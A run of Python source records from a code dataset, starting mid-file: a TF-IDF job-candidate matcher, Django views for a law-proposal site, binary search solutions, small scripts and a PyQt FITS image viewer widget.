in banco_vagas['hits']['hits']:\r\n \r\n texto = doc['_source']['text']\r\n \r\n vaga_corpus = []\r\n for bloco_tex in texto:\r\n \r\n vaga = re.sub(\"[0-9]\", ' ', bloco_tex)\r\n vaga = re.sub(\"[+.*@:,?/;% \\n]\", ' ', vaga)\r\n vaga = vaga.lower() # letra minúscula\r\n vaga = vaga.split() # separação das palavras\r\n vaga = ' '.join(vaga) # União do bloco \r\n vaga_corpus.append(vaga)\r\n \r\n vaga_corpus=' '.join(vaga_corpus) # União 1 string por doc \r\n vagas_corpus.append(vaga_corpus) \r\n \r\n return vagas_corpus\r\n \r\n \r\n limpador1(banco_cand)\r\n limpador2(banco_vagas)\r\n \r\n #candidatos_corpus_t=candidatos_corpus\r\n #print(len(candidatos_corpus_t))\r\n \r\n while (scroll_size > 0) :\r\n banco_cand = dbes.scroll(scroll_id = sid, scroll = '2m')\r\n sid = banco_cand['_scroll_id']\r\n scroll_size = len(banco_cand['hits']['hits'])\r\n \r\n limpador1(banco_cand)\r\n print(len(candidatos_corpus))\r\n# candidatos_corpus_t=candidatos_corpus\r\n# \r\n CorpusTotal = candidatos_corpus + vagas_corpus\r\n\r\n \r\n print(len(CorpusTotal))\r\n \r\n print('Limpeza dos textos concluída')\r\n \r\n # ==== Creating the Bag of Words model ===== \r\n \r\n # --------------------TF-------------------\r\n \r\n from sklearn.feature_extraction.text import CountVectorizer\r\n cv = CountVectorizer(max_features = 2000)\r\n Sparsa = cv.fit_transform(CorpusTotal).toarray()\r\n \r\n tam=len(CorpusTotal) # número de documentos no corpus vagas + candidatos\r\n \r\n print('Construção de TF concluída')\r\n \r\n # -------- Normalização-------------------\r\n NOR = []\r\n for t in Sparsa: \r\n su = sum(t)\r\n X22 = (t/su).tolist() \r\n print(X22)\r\n NOR.append(X22)\r\n print('Normalização concluída')\r\n \r\n # Conversão para array \r\n \r\n NORAr = np.asarray(NOR) \r\n NORArTr = NORAr.transpose()\r\n \r\n \r\n # Contagem de vezes que uma palavra aparece em todos os documentos:\r\n \r\n dif_zero = [] # Vetor de diferente de zero\r\n \r\n for c in NORArTr:\r\n count_dif = 0\r\n for cc in c: \r\n if cc > 0:\r\n count_dif += 1 \r\n dif_zero.append(count_dif)\r\n\r\n \r\n \r\n #----------------IDF------------------------\r\n \r\n Xidf = []\r\n \r\n for k in range(0, len(Sparsa[0][:])):\r\n idfw = np.log(tam/(1 + dif_zero[k]))\r\n Xidf.append(idfw)\r\n \r\n print('vetor IDF concluído')\r\n # -------------TFIDF-------------------- \r\n\r\n TFIDF=[]\r\n \r\n for d in Sparsa:\r\n mul_tfidf = [a*b for a,b in list(zip(d,Xidf))]\r\n TFIDF.append(mul_tfidf)\r\n \r\n print('TFIDF de todas os processos e candidatos conluído')\r\n \r\n # Salvando ou atualizando o valor TFIDF:\r\n \r\n # no documento dos candidatos \r\n \r\n print('Atualizando vagas e candidatos com TFIDF') \r\n ind = 0\r\n query={\"query\": {\"match_all\": {}}}\r\n ess1 = dbes.search(index = schema+'_pool_candidatos', doc_type = 'candidatos',scroll='2m',search_type = 'query_then_fetch', size=1000,body=query)\r\n sid = banco_cand['_scroll_id']\r\n scroll_size = len(banco_cand['hits']['hits'])\r\n \r\n for doc in ess1['hits']['hits']:\r\n \r\n item1 = doc['_source']['cod_cand']\r\n \r\n dbes.update(index = schema+'_pool_candidatos', doc_type = 'candidatos', id = item1 , body = {\"doc\":\r\n {'TFIDF': TFIDF[ind]} \r\n })\r\n print(item1) #Codigo do candidato\r\n ind += 1\r\n ind2 = ind \r\n \r\n while (scroll_size > 0) :\r\n banco_cand = dbes.scroll(scroll_id = sid, scroll = '10m')\r\n sid = banco_cand['_scroll_id']\r\n scroll_size = len(banco_cand['hits']['hits'])\r\n for doc in ess1['hits']['hits']:\r\n \r\n item1 = doc['_source']['cod_cand']\r\n \r\n dbes.update(index = schema+'_pool_candidatos', doc_type = 'candidatos', id = item1 , body = {\"doc\":\r\n {'TFIDF': TFIDF[ind2]} \r\n })\r\n print(item1) #Codigo do candidato\r\n ind2 += 1\r\n \r\n \r\n ess2 = dbes.search(index = schema+'_pool_vagas', doc_type = 'vagas', size = 10000)\r\n ind3 = ind2\r\n \r\n # no documento das vagas\r\n for doc in ess2['hits']['hits']:\r\n \r\n item1 = doc['_source']['cod_vaga']\r\n \r\n dbes.update(index = schema+'_pool_vagas', doc_type = 'vagas', id = item1 , body = {\"doc\":\r\n {'TFIDF':TFIDF[ind3]} \r\n })\r\n print(item1) # Codigo da vaga\r\n ind3 += 1 \r\n print('Upload dos TFIDF no banco ES concluído')\r\n# \r\n return TFIDF","sub_path":"api/api_tfidf/api_tfidf.py","file_name":"api_tfidf.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"640654000","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom django.http import Http404, JsonResponse, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.contenttypes.models import ContentType\nfrom CreateYourLaws.models import LawCode, LawArticle\nfrom CreateYourLaws.models import CodeBlock, Question, Disclaim\nfrom CreateYourLaws.models import Explaination, Opinion, Proposition\nfrom CreateYourLaws.models import Note\nfrom CreateYourLaws.forms import QuestionForm, Create_CYL_UserForm\nfrom CreateYourLaws.forms import PropositionForm, Del_account_form\nfrom CreateYourLaws.forms import ExplainationForm, OpinionForm, DisclaimForm\nfrom CreateYourLaws.forms import Info_Change_Form\nfrom CreateYourLaws.views_functions import get_path, get_the_instance\nfrom django.utils.translation import ugettext as _\nfrom django.template.response import TemplateResponse\n\n\n@login_required\ndef home(request):\n \"\"\" Exemple de page HTML, non valide pour que l'exemple soit concis \"\"\"\n qs = LawCode.objects.all()\n lqs = list(qs)\n return render(request, 'home.html', locals())\n\n\n# ################################# nav JStree ################################\n\n@login_required\ndef nav_up(request, idbox):\n \"\"\"ajax for CYL nav: update the tree\"\"\"\n id_box = int(idbox[1:len(idbox)])\n children = []\n JSON_obj = []\n if idbox[0] == 'A':\n listArticle = list(\n LawArticle.objects.filter(law_code=id_box,\n block_id__isnull=True).order_by('id'))\n else:\n listArticle = list(\n LawArticle.objects.filter(block=id_box).order_by('id'))\n if listArticle:\n for el in listArticle:\n children.append(('C' + str(el.id),\n el.title,\n \"GetReflection\",\n 'loi:' + str(el.id),\n False))\n if idbox[0] == 'A':\n listBlock = list(\n CodeBlock.objects.filter(rank=1, law_code=id_box).order_by('id'))\n else:\n listBlock = list(\n CodeBlock.objects.filter(block=id_box).order_by('id'))\n if listBlock:\n for el in listBlock:\n children.append(('B' + str(el.id),\n el.title,\n \"InDatBox\",\n '2:' + str(el.id),\n True))\n for elem in children:\n # 'B' in the 'id' param inform that this is a Code BLock\n JSON_obj.append({'id': elem[0],\n 'text': elem[1],\n 'a_attr': {'class': elem[2],\n 'name': elem[3]},\n 'children': elem[4]})\n return JsonResponse(JSON_obj, safe=False)\n\n\n@login_required\ndef nav_init(request):\n \"\"\"ajax for CYL nav: init the tree\"\"\"\n law_codes = list(LawCode.objects.all())\n JSON_obj = []\n for i, el in enumerate(law_codes):\n # 'A' in the 'id' param inform that this is a Law code\n JSON_obj.append({'id': 'A' + str(el.id),\n 'text': el.title,\n 'a_attr': {\"class\": \"InDatBox\",\n \"name\": \"1:\" + str(el.id)},\n 'children': True})\n return JsonResponse(JSON_obj, safe=False)\n\n\n# ################################ UP and DOWN ################################\n\n@login_required\n@require_POST\ndef UP(request):\n if request.method == 'POST':\n user = request.user\n slug = request.POST.get('slug', None)\n typ, Id = slug.split(sep=\":\")\n obj = get_the_instance(typ, Id)\n ct = ContentType.objects.get_for_model(obj)\n # -------------------------------------------------------------\n # About proposition and User must have 1 position:\n # Impossible to approve a Law and a counter-proposition about the Law\n # or 2 counter-proposition about the same law\n # -------------------------------------------------------------\n data = {}\n if isinstance(obj, Proposition):\n try:\n note = Note.objects.get(user=user,\n content_type=ct,\n object_id=obj.id)\n if note.approve:\n getit = True\n else:\n getit = False\n except Exception:\n getit = False\n listprop = list(Proposition.objects.filter(\n law_article=obj.law_article))\n for x in listprop:\n data['#donprp' + str(x.id)] = str(x.approval_ratio)\n x.notes.filter(user=user, approve=True).delete()\n lart = obj.law_article\n data['#donloi' + str(lart.id)] = str(x.approval_ratio)\n lart.notes.filter(user=user, approve=True).delete()\n elif isinstance(obj, LawArticle):\n getit = False\n listprop = list(Proposition.objects.filter(\n law_article=obj))\n for x in listprop:\n data['#donprp' + str(x.id)] = str(x.approval_ratio)\n x.notes.filter(user=user, approve=True).delete()\n else:\n getit = False\n # -------------------------------------------------------------\n note, created = Note.objects.get_or_create(user=user,\n content_type=ct,\n object_id=obj.id)\n if (created is False and note.approve) or getit:\n message = \"Vous approuvez déjà cette réflexion.\"\\\n + \"\\nVous ne pouvez approuver ou\"\\\n + \" désapprouver qu'une seule fois une réflexion.\"\\\n + \"\\nVous pouvez Cependant changer \"\\\n + \"d'avis autant de fois que vous voulez.\"\n else:\n message = \"\"\n note.approve = True\n note.save()\n obj = get_the_instance(typ, Id)\n ctx = {'message': message,\n 'approb': str(obj.approval_ratio),\n 'data': data}\n return JsonResponse(ctx)\n\n\n@login_required\n@require_POST\ndef DOWN(request):\n if request.method == 'POST':\n user = request.user\n slug = request.POST.get('slug', None)\n typ, Id = slug.split(sep=\":\")\n obj = get_the_instance(typ, Id)\n ct = ContentType.objects.get_for_model(obj)\n note, created = Note.objects.get_or_create(user=user,\n content_type=ct,\n object_id=obj.id)\n if created is False and note.approve is False:\n message = \"Vous désapprouvez déjà cette réflexion.\"\\\n + \"\\nVous ne pouvez approuver ou\"\\\n + \" désapprouver qu'une seule fois une réflexion.\"\\\n + \"\\nVous pouvez Cependant changer \"\\\n + \"d'avis autant de fois que vous voulez.\"\n else:\n message = \"\"\n note.approve = False\n note.save()\n obj = get_the_instance(typ, Id)\n ctx = {'message': message, 'approb': str(obj.approval_ratio)}\n return JsonResponse(ctx)\n\n\n# ################################# User ####################################\n\ndef Create_User(request):\n \"\"\" Use to create a new User\"\"\"\n registered = False\n if request.method == 'POST':\n user_form = Create_CYL_UserForm(data=request.POST)\n if user_form.is_valid():\n user = user_form.save()\n user.set_password(user.password)\n user.save()\n registered = True\n else:\n user_form = Create_CYL_UserForm()\n return render(request, 'registration.html', locals())\n\n\ndef Checkbox(request): # A revoir\n print('FONCTION CALLED')\n if request.method == 'POST':\n typeref = request.POST.get('typeref', None)\n ref_id = request.POST.get('ref_id', None)\n checked = request.POST.get('check', None)\n ctx = {}\n return JsonResponse(ctx)\n\n\n@login_required\ndef info_change_done(request,\n template_name='registration/info_change_done.html',\n extra_context=None):\n \"\"\" triggered when a user changed his own infos successfuly \"\"\"\n context = {\n 'title': _('Info change successful'),\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(request, template_name, context)\n\n\n@login_required\ndef view_profile(request, set_var=\"info\"):\n \"\"\" \"\"\"\n if request.method == 'POST' and 'infochangebut' in request.POST:\n infochangeform = Info_Change_Form(user=request.user,\n data=request.POST)\n set_var = \"info\"\n if infochangeform.is_valid():\n infochangeform.save()\n return redirect('/CYL/info/change/done')\n else:\n infochangeform = Info_Change_Form(user=request.user)\n if request.method == 'POST' and 'pwdchangebut' in request.POST:\n pwdchangeform = PasswordChangeForm(user=request.user,\n data=request.POST)\n set_var = \"pwd\"\n if pwdchangeform.is_valid():\n pwdchangeform.save()\n update_session_auth_hash(request, pwdchangeform.user)\n return redirect('/CYL/accounts/password/change/done')\n else:\n pwdchangeform = PasswordChangeForm(user=request.user)\n if request.method == 'POST' and 'delaccountbut'in request.POST:\n del_form = Del_account_form(request.POST)\n set_var = \"del\"\n if del_form.is_valid(request.user):\n request.user.delete()\n return redirect('/CYL/accounts/login')\n else:\n del_form = Del_account_form()\n return render(request, 'account_set.html', locals())\n\n# ############################# Interaction ##################################\n\n\n@login_required\ndef In_dat_box(request):\n \"\"\" List the blocks or articles contained in a law code or boxe \"\"\"\n slug = request.POST.get('slug', None)\n box_type, box_id = slug.split(sep=\":\")\n box_id = int(box_id)\n if box_type == '1':\n lqs = list(\n LawArticle.objects.filter(law_code=box_id,\n block_id__isnull=True).order_by('id'))\n lqs += list(\n CodeBlock.objects.filter(rank=1, law_code=box_id).order_by('id'))\n Box = LawCode.objects.get(id=box_id)\n listparents = []\n else:\n lqs = list(\n LawArticle.objects.filter(block=box_id).order_by('id'))\n lqs += list(\n CodeBlock.objects.filter(block=box_id).order_by('id'))\n Box = CodeBlock.objects.get(id=box_id)\n listparents = []\n lastbox = Box\n while lastbox.rank != 1:\n parent = lastbox.block\n listparents.append((parent.title, parent.id, 2))\n lastbox = parent\n parent = Box.law_code\n listparents.append((parent.title, parent.id, 1))\n listparents.reverse()\n intro = render_to_string('intro_InDatBox.html', locals())\n content = render_to_string('content_InDatBox.html', locals())\n ctx = {'intro': intro, 'content': content}\n return JsonResponse(ctx)\n\n\n@login_required\ndef get_reflection(request):\n \"\"\" View which display a reflection and its child\n reflections from its ID\"\"\"\n # Does the reflection extist?\n slug = request.POST.get('slug', None)\n typeref, id_ref = slug.split(sep=\":\")\n id_ref = int(id_ref)\n try:\n if typeref == 'loi':\n ref = LawArticle.objects.get(id=id_ref)\n elif typeref == 'qst':\n ref = Question.objects.get(id=id_ref)\n elif typeref == 'exp':\n ref = Explaination.objects.get(id=id_ref)\n elif typeref == 'dis':\n ref = Disclaim.objects.get(id=id_ref)\n elif typeref == 'opn':\n ref = Opinion.objects.get(id=id_ref)\n elif typeref == 'prp':\n ref = Proposition.objects.get(id=id_ref)\n except Exception:\n raise Http404\n # where is it from? path to the reflection\n if typeref == 'loi':\n parent = ref.block\n if parent is None:\n listparents = []\n else:\n listparents = [(parent.title, parent.id, 2)]\n while parent.rank != 1:\n parent = parent.block\n listparents.append((parent.title, parent.id, 2))\n parent = ref.law_code\n listparents.append((parent.title, parent.id, 1))\n listparents.reverse()\n # ######## elif typeref == 'prop'\n else:\n law_code, list_parents = get_path(ref)\n \"\"\"\n user_session = UserSession.objects.get(\n session_id=request.session.session_key)\n User = user_session.user\n \"\"\"\n User = request.user\n # forms initializations\n if request.method == 'POST' and 'btnqform' in request.POST:\n qform = QuestionForm(request.POST)\n if qform.is_valid():\n qtitle = qform.cleaned_data['title']\n question = qform.cleaned_data['text_q']\n q = Question.objects.create(text_q=question,\n title=qtitle,\n autor=User,\n content_object=ref)\n q.save()\n else:\n qform = QuestionForm()\n if request.method == 'POST' and 'btnexpform' in request.POST:\n expform = ExplainationForm(request.POST)\n if expform.is_valid():\n exptitle = expform.cleaned_data['title']\n explain = expform.cleaned_data['text_exp']\n exp = Explaination.objects.create(title=exptitle,\n text_exp=explain,\n autor=User,\n content_object=ref)\n exp.save()\n else:\n expform = ExplainationForm()\n if typeref == 'exp' or typeref == 'opn' or typeref == 'dis':\n if request.method == 'POST' and 'btndisform' in request.POST:\n disform = DisclaimForm(request.POST)\n if disform.is_valid():\n distitle = disform.cleaned_data['title']\n distext = disform.cleaned_data['text_dis']\n disc = Disclaim.objects.create(title=distitle,\n text_dis=distext,\n autor=User,\n content_object=ref).save()\n else:\n disform = DisclaimForm()\n if typeref == 'loi' or typeref == 'prp':\n if request.method == 'POST' and 'btnopform' in request.POST:\n opform = OpinionForm(request.POST)\n if opform.is_valid():\n pos = opform.cleaned_data['positive']\n optitle = opform.cleaned_data['title']\n opin = opform.cleaned_data['text_op']\n op = Opinion.objects.create(text_op=opin,\n title=optitle,\n positive=pos,\n autor=User,\n content_object=ref)\n op.save()\n else:\n opform = OpinionForm()\n if request.method == 'POST' and 'propform' in request.POST:\n propform = PropositionForm(request.POST)\n if propform.is_valid():\n proptitle = propform.cleaned_data['title']\n prop = propform.cleaned_data['text_prop']\n if isinstance(ref, LawArticle):\n lawart = ref\n else:\n lawart = ref.law_article\n prp = Proposition.objects.create(text_prop=prop,\n title=proptitle,\n autor=User,\n law_article=lawart,\n content_object=ref)\n\n prp.save()\n else:\n propform = PropositionForm()\n\n # load all the disclaims, other proposions, opinions, comments and\n # questions about the reflection\n listexplainations = list(ref.explainations.all())\n listquestions = list(ref.questions.all())\n if typeref == 'exp' or typeref == 'opn' or typeref == 'dis':\n listdisclaims = list(ref.disclaims.all())\n if typeref == 'loi' or typeref == 'prp':\n listposop = list(ref.opinions.filter(positive=True))\n listnegop = list(ref.opinions.filter(positive=False))\n listpropositions = list(ref.propositions.all())\n intro = render_to_string('intro_reflec.html', locals())\n content = render_to_string('content_reflec.html', locals())\n ctx = {'intro': intro, 'content': content}\n return JsonResponse(ctx)\n\n\ndef PostAProp(request): # Trouver un moyen d'avoir ID_ref\n typeref = request.POST.get('typeref', '')\n idref = request.POST.get('ref_id', '')\n if typeref == 'prp':\n ref = Proposition.objects.get(\n id=idref\n )\n else:\n ref = LawArticle.objects.get(\n id=request.POST.get('ref_id', '')\n )\n if request.method == 'POST':\n propform = PropositionForm(request.POST)\n print(propform.is_valid())\n if propform.is_valid():\n print(\"hello! Is it me you are looking for?\")\n proptitle = propform.cleaned_data['title']\n prop = propform.cleaned_data['text_prop']\n if isinstance(ref, LawArticle):\n lawart = ref\n else:\n lawart = ref.law_article\n prp = Proposition.objects.create(text_prop=prop,\n title=proptitle,\n autor=User,\n law_article=lawart,\n content_object=ref)\n prp.save()\n else:\n propform = PropositionForm()\n listpropositions = list(ref.propositions.all())\n NewPropSection = render_to_string('UpPropSection.html', locals())\n ctx = {'proposition': NewPropSection}\n return JsonResponse(ctx)\n\n\n@login_required\ndef list_of_reflections(request, parent_type, parent_id, list_ref_type):\n \"\"\" display the list of given reflection type from the parent obj.\n ex: list of the questions asked about law article X.\"\"\"\n parent = get_the_instance(parent_type, parent_id)\n if list_ref_type == 'qst':\n list_to_display = list(parent.questions.all())\n elif list_ref_type == 'exp':\n list_to_display = list(parent.explainations.all())\n elif list_ref_type == 'dis':\n list_to_display = list(parent.disclaims.all())\n elif list_ref_type == 'opv':\n list_to_display = list(parent.opinions.filter(positive=True))\n positif = True\n elif list_ref_type == 'opx':\n list_to_display = list(parent.opinions.filter(positive=False))\n positif = False\n elif list_ref_type == 'prp':\n list_to_display = list(parent.propositions.all())\n return render(request, 'displaylist.html', locals())\n\n\n@login_required\ndef create_new_article():\n \"\"\" View to create a new article \"\"\"\n pass\n\n@login_required\ndef create_new_box():\n \"\"\" View to create a new Law Code or codeblock \"\"\"\n pass\n","sub_path":"democratos/CreateYourLaws/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"406425244","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n \n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) //2\n if nums[mid] == target:\n return mid\n if nums[mid] < nums[right]: # right half must be sorted\n # if target is in this sorted half then do binary searc\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n # if target is not in the sorted half then \n else:\n right = mid - 1\n elif nums[mid] >= nums[right]: # left half must be sorted\n if nums[left] <= target < nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n return -1 \n\n# 讲解 https://blog.csdn.net/fuxuemingzhu/article/details/79534213\n\n\n\n# second time\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n if not nums:\n return -1\n \n start, end = 0, len(nums) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n if nums[mid] >= nums[start]:\n if nums[start] <= target <= nums[mid]:\n end = mid\n else:\n start = mid\n else:\n if nums[mid] <= target <= nums[end]:\n start = mid\n else:\n end = mid\n \n if nums[start] == target:\n return start\n if nums[end] == target:\n return end\n return -1","sub_path":"binary_search/33_rotated_array.py","file_name":"33_rotated_array.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"145726385","text":"from selenium import webdriver\nimport time\nx=raw_input(\"Enter the URL\")\nrefreshrate=raw_input(\"Enter the number of seconds\")\nrefreshrate=int(refreshrate)\ndriver = webdriver.Firefox()\ndriver.get(\"http://\"+x)\nwhile True:\n\ttime.sleep(refreshrate)\n\tdriver.refresh()\n","sub_path":"refresh.py","file_name":"refresh.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"64569094","text":"#nomor 4\ndef kelipatan(a):\n for i in range(1,a+1):\n if i % 3 == 0 and i % 7 == 0:\n print(\"Arkademy\",end=\", \")\n elif i % 3 == 0 :\n print(\"Arka\", end=\", \")\n elif i % 7 == 0 :\n print(\"Demy\", end=\", \")\n else:\n print(i, end=\", \")\n \nkelipatan(21)\n","sub_path":"nomor_4.py","file_name":"nomor_4.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409052219","text":"\r\n# Print Number of Wins and Percentage of Win and Loss o f a gambler\r\n\r\nimport random\r\n\r\nstake = int(input(\"Enter the Stake\\n\"))\r\ngoal = int(input(\"Enter the goal\\n\"))\r\ntime = int(input(\"Enter the number times\\n\"))\r\nbet = 0\r\nloss = 0\r\nwin = 0\r\nn = random.randint(0, 1)\r\nfor i in range(time):\r\n cash = stake\r\n while (cash != goal) and (cash != 0):\r\n bet += 1 # each time he wil place a bet until he reaches his goal\r\n if n < 0.5:\r\n cash += 1\r\n else:\r\n cash -= 1\r\n if cash == goal: # gambler wins if he reaches its goal else loose\r\n win += 1\r\n else:\r\n loss += 1\r\nprint(\"total number of wins\", win)\r\nprint(\"total number of loss\", loss)\r\nprint(\"persantage of wins\", (win / (win+loss)) * 100)\r\nprint(\"persantage of loss\", (loss / (win+loss)) * 100)\r\n","sub_path":"FunctionalPrograms/GamblerProg.py","file_name":"GamblerProg.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534921454","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nimport numpy as np\nfrom PyQt5.QtCore import pyqtSignal\nfrom astropy.wcs import WCS\nimport astropy.units as u\nimport matplotlib.pyplot as plt\nfrom astropy.wcs.utils import pixel_to_skycoord\nfrom matplotlib import colors\nfrom matplotlib.cm import ScalarMappable\nfrom skimage.transform import resize\n\nfrom .fitswidget import Ui_FitsWidget\nfrom .norm import *\n\n\nclass ProcessThread(QtCore.QThread):\n \"\"\"Worker thread for processing images and all display options applied to them.\"\"\"\n\n \"\"\"Signal emitted when the image is readily processed.\"\"\"\n imageReady = pyqtSignal(QtGui.QImage)\n\n def __init__(self, method, *args, **kwargs):\n \"\"\"Init a new worker thread.\n\n Args:\n method: Method to run in thread.\n \"\"\"\n QtCore.QThread.__init__(self, *args, **kwargs)\n self.method = method\n\n def run(self):\n \"\"\"Run method in thread.\"\"\"\n\n # run method and receive processed image\n image = self.method()\n\n # emit signal with image\n self.imageReady.emit(image)\n\n\nclass QFitsWidget(QtWidgets.QWidget, Ui_FitsWidget):\n \"\"\"PyQt Widget for displaying FITS images.\"\"\"\n\n \"\"\"Signal emitted when new cuts have been calculated.\"\"\"\n calculatedCuts = pyqtSignal(int, int)\n\n def __init__(self, parent=None):\n \"\"\"Init new widget.\"\"\"\n QtWidgets.QWidget.__init__(self, parent)\n self.setupUi(self)\n\n # mouse\n self.imageView.mouseMoved.connect(self._mouse_moved)\n\n # set cuts\n self.comboCuts.addItems(['100.0%', '99.9%', '99.0%', '95.0%', 'Custom'])\n self.comboCuts.setCurrentText('99.9%')\n\n # set stretch functions\n self.comboStretch.addItems(['linear', 'log', 'sqrt', 'squared', 'asinh'])\n self.comboStretch.setCurrentText('sqrt')\n\n # set colormaps\n self.comboColormap.addItems(sorted([cm for cm in plt.colormaps() if not cm.endswith('_r')]))\n self.comboColormap.setCurrentText('gray')\n self._colormap_changed()\n\n # store hdu and (scaled) data\n self.hdu = None\n self.data = None\n self.trimmed_data = None\n self.sorted_data = None\n self.scaled_data = None\n self.pixmap = None\n self.cuts = None\n self.wcs = None\n self.position_angle = None\n self.mirrored = None\n self.thread = None\n\n # connect signals/slots that start threads\n self.comboCuts.currentTextChanged.connect(lambda: self._run_in_thread(self._evaluate_cuts_preset))\n self.spinLoCut.valueChanged.connect(lambda: self._run_in_thread(self._apply_cuts))\n self.spinHiCut.valueChanged.connect(lambda: self._run_in_thread(self._apply_cuts))\n self.checkTrimSec.stateChanged.connect(lambda: self._run_in_thread(self._trim_image))\n\n # and now all the others\n self.comboStretch.currentTextChanged.connect(self._colormap_changed)\n self.comboColormap.currentTextChanged.connect(self._colormap_changed)\n self.checkColormapReverse.stateChanged.connect(self._colormap_changed)\n self.calculatedCuts.connect(self._update_cuts_gui)\n\n def display(self, hdu):\n \"\"\"Display image from given HDU.\n\n Args:\n hdu: HDU to show image from.\n \"\"\"\n\n # check supported formats\n if len(hdu.data.shape) == 2:\n # any 2D image is supported\n pass\n elif len(hdu.data.shape) == 3:\n # we need three images of uint8 format\n if hdu.data.shape[0] != 3:\n raise ValueError('Data cubes only supported with three layers, which are interpreted as RGB.')\n\n # store HDU and create WCS\n self.hdu = hdu\n self.wcs = WCS(hdu.header)\n\n # get position angle and check whether image was mirrored\n if 'PC1_1' in self.hdu.header:\n CD11, CD12 = self.hdu.header['PC1_1'], self.hdu.header['PC1_2']\n CD21, CD22 = self.hdu.header['PC2_1'], self.hdu.header['PC2_2']\n self.position_angle = np.degrees(np.arctan2(CD12, CD11))\n self.mirrored = (CD11 * CD22 - CD12 * CD21) < 0\n else:\n self.position_angle = None\n self.mirrored = None\n\n # do we have a bayer matrix given?\n if 'BAYERPAT' in self.hdu.header or 'COLORTYP' in self.hdu.header:\n # got a bayer pattern\n pattern = self.hdu.header['BAYERPAT' if 'BAYERPAT' in self.hdu.header else 'COLORTYP']\n\n # debayer iamge\n self.data = self._debayer(self.hdu.data, pattern)\n\n else:\n # just take data\n self.data = self.hdu.data\n\n # for INT8 images, we don't need cuts\n is_int8 = self.data.dtype == np.uint8\n\n # colour image?\n is_color = len(self.data.shape) == 3 and self.data.shape[0] == 3\n\n # enable GUI elements, only important for first image after start\n self.labelCuts.setEnabled(not is_int8)\n self.comboCuts.setEnabled(not is_int8)\n self.spinLoCut.setEnabled(not is_int8)\n self.spinHiCut.setEnabled(not is_int8)\n self.labelStretch.setEnabled(not is_int8)\n self.comboStretch.setEnabled(not is_int8)\n self.labelColormap.setEnabled(not is_color)\n self.comboColormap.setEnabled(not is_color)\n self.checkColormapReverse.setEnabled(not is_color)\n self.checkTrimSec.setEnabled(True)\n\n # apply trimsec, run in thread\n self._run_in_thread(self._trim_image)\n\n def _run_in_thread(self, method):\n \"\"\"Run the given method in a thread.\n\n Args:\n method: Method to run.\n \"\"\"\n\n # only one thread at a time\n if self.thread is not None and self.thread.isRunning():\n raise ValueError('Thread already running.')\n\n # disable widget and show wait cursor\n self.setEnabled(False)\n QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)\n\n # create and start thread\n self.thread = ProcessThread(method)\n self.thread.imageReady.connect(self._show_image)\n self.thread.start()\n\n def _show_image(self, image):\n \"\"\"Called when the ProcessThread finishes processing an image.\n\n Args:\n image: Processed image.\n \"\"\"\n\n # now we need to display it\n self.imageView.setImage(image, self.position_angle, self.mirrored)\n\n # update info\n x, y = self.imageView.last_cursor_pos\n self._mouse_moved(x, y)\n\n # restore mouse cursor and enable widget\n QtWidgets.QApplication.restoreOverrideCursor()\n self.setEnabled(True)\n\n def _trim_image(self):\n \"\"\"Trim image and sort data for calculating cuts.\n\n Returns:\n Processed image.\n \"\"\"\n\n # cut trimsec\n self.trimmed_data = self._trimsec(self.hdu, self.data) if self.checkTrimSec.isChecked() else self.data\n\n # store flattened and sorted pixels\n self.sorted_data = np.sort(self.trimmed_data[self.trimmed_data > 0].flatten())\n\n # image type?\n if self.trimmed_data.dtype == np.uint8:\n # image is scaled image directly\n self.scaled_data = self.trimmed_data.copy()\n return self._create_qimage()\n\n else:\n # apply cuts\n return self._evaluate_cuts_preset()\n\n def _evaluate_cuts_preset(self):\n \"\"\"When the cuts preset has changed, calculate the new cuts\"\"\"\n\n # get preset\n preset = self.comboCuts.currentText()\n if preset == 'Custom':\n # just enable text boxes\n self.spinLoCut.setEnabled(True)\n self.spinHiCut.setEnabled(True)\n return self._apply_cuts()\n\n # get percentage\n percent = float(preset[:-1])\n\n # get number of pixels to discard at both ends\n n = int(len(self.sorted_data) * (1. - (percent / 100.)))\n\n # get min/max in cut range\n cut = self.sorted_data[n:-n] if n > 0 else self.sorted_data\n cuts = (np.min(cut), np.max(cut))\n\n # update gui\n # we need to do this via a signal, since this method is always run from a different thread\n self.calculatedCuts.emit(cuts[0], cuts[1])\n\n # apply cuts\n return self._apply_cuts(cuts)\n\n def _update_cuts_gui(self, lo, hi):\n \"\"\"Update current cuts shown in GUI.\n\n Args:\n lo: Low cut.\n hi: Hight cut.\n \"\"\"\n\n # disable signals\n self.spinLoCut.blockSignals(True)\n self.spinHiCut.blockSignals(True)\n\n # set them and disable text boxes\n self.spinLoCut.setValue(lo)\n self.spinLoCut.setEnabled(False)\n self.spinHiCut.setValue(hi)\n self.spinHiCut.setEnabled(False)\n\n # enable signals\n self.spinLoCut.blockSignals(True)\n self.spinHiCut.blockSignals(True)\n\n def _apply_cuts(self, cuts=None):\n \"\"\"Apply cuts to image.\n\n 